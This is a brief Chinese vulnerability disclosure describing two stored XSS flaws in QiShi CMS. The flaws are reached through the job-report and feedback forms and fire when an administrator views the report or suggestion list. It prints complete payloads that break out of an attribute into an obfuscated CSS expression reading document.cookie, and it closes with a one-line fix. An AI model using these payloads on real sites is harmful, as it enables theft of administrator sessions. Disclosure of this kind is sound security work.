骑士CMS存储型XSS两枚专打管理员

骑士CMS存储型XSS两枚专打管理员。

1. 首页>招聘信息>职位详情

在页面里面可以看到“举报”

点击举报,输入:

我要举报这个骗人的职位,这家公司是流氓什么什么什么什么什么" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a="

4.png

后台管理员进入举报列表页面即中招。

2.PNG

2. 每个页面都可以看到“我要建议”的那个图标,点击提交建议:

意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a="a

3.png

后台管理员进入建议列表页面即中招。

1.PNG

IE8测试结果如下。其他浏览器几乎都被过滤完了。

2.PNG

解决方案:

过滤xss的时候吧style也一同过滤了吧